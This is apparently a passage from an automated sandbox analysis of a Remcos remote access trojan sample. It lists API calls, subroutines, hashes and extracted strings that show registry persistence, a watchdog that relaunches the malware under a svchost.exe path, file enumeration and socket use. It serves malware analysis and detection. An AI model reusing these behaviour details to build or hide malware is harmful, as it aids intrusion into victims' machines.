                                                                                  • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C43
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                                                                  • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                                                                  • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                                                                  • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                                                                  • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                                                                  • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                                                                  • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                                                                  • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                                                                • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                                                                • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                                                                  • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024FF
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                                                                • atoi.MSVCRT ref: 00404B88
                                                                                  • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                                                                  • Part of subcall function 00404EA7: #3.WS2_32(?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404EEE
                                                                                  • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                                                                • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                                                                • atoi.MSVCRT ref: 00404BE5
                                                                                • FindClose.KERNEL32(?), ref: 00404BF6
                                                                                • ExitThread.KERNEL32 ref: 00404BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoi$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 1578901561-0
                                                                                • Opcode ID: f6688f26f3f57a56693712141f2b566ff735a31b20a2d6653c0cb94a94c5575e
                                                                                • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                                                                • Opcode Fuzzy Hash: f6688f26f3f57a56693712141f2b566ff735a31b20a2d6653c0cb94a94c5575e
                                                                                • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                                                                  • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                                                                  • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                                                                  • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                                                                • OpenMutexA.KERNEL32 ref: 0040A63B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                                                                  • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                  • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                  • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                  • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                  • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                  • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                                                                  • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                                                                  • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                                                                • _wgetenv.MSVCRT ref: 0040A7B3
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                                                                • _wgetenv.MSVCRT ref: 0040A758
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                                                                • CloseHandle.KERNEL32 ref: 0040A8AA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 004105AD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
